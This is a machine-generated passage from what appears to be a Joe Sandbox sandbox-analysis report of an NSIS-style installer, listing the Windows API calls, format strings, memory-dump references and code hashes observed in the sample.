                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                    • String ID: verifying installer: %d%%
                                                                                                    • API String ID: 1451636040-82062127
                                                                                                    • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                    • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                                    • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                    • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                    • wsprintfW.USER32 ref: 00404457
                                                                                                    • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                    • String ID: %u.%u%s%s$@rD
                                                                                                    • API String ID: 3540041739-1813061909
                                                                                                    • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                    • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                                    • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                    • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                                    APIs
                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                    • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                    • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$Next$Prev
                                                                                                    • String ID: *?|<>/":
                                                                                                    • API String ID: 589700163-165019052
                                                                                                    • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                    • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                                    • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                    • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1912718029-0
                                                                                                    • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                    • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                    • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                    • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 1849352358-0
                                                                                                    • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                    • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                    • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                    • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                    APIs
                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Timeout
                                                                                                    • String ID: !
                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                    • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                    • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                    • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                    • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                    APIs
                                                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    Strings
                                                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                    • API String ID: 1697273262-1764544995
                                                                                                    • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                    • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                    • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                    • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                    APIs
                                                                                                    • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                    • String ID: $@rD
                                                                                                    • API String ID: 3748168415-881980237
                                                                                                    • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                    • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                    • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                    • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                    APIs
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                      • Part of subcall function 004062D5: FindFirstFileW.KERNEL32(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                      • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                                                    • API String ID: 2577523808-3778932970
                                                                                                    • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                    • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                    • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                    • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcatwsprintf
                                                                                                    • String ID: %02x%c$...
                                                                                                    • API String ID: 3065427908-1057055748
                                                                                                    • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                    • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                    • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                    • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                    APIs
                                                                                                    • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                    • API String ID: 2266616436-4211696005
                                                                                                    • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                    • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                    • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                    • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                    APIs
                                                                                                    • GetDC.USER32(?), ref: 00402100
                                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                    • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1599320355-0
                                                                                                    • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                    • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                    • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                    • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                    • String ID: Version
                                                                                                    • API String ID: 512980652-315105994
                                                                                                    • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                    • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                                    • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                    • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                    • String ID:
                                                                                                    • API String ID: 2102729457-0
                                                                                                    • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                    • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                                    • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                    • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
